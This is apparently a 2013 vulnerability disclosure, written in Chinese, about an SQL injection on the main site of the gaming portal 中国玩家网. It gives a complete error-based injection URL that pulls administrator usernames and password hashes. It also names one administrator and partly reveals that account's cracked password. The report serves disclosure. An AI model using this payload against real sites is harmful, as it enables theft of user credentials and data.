中国玩家网漏洞可获得任意用户密码hash

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:
中国玩家网主站SQL注入一枚。

详细说明:
中国玩家网主站存在SQL注入一枚,可获得所有管理员和普通用户的密码,造成用户数据泄露。

漏洞证明:
访问如下链接:
?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
获得了一条管理员用户的用户名和加密密码的信息,如图1。只要稍微修改一下利用代码,就可以获得所有管理员用户和普通用户的用户名和密码。密码虽然是经过加密的,但只要不是很复杂,很容易破解出明文密码,比如获得huxiaojun这个管理员用户的密码为5750xxxx。可能造成所有用户数据泄露,危害不小。

中国玩家网漏洞可获得任意用户密码hash

修复方案:
建议打补丁,官方已经出了补丁。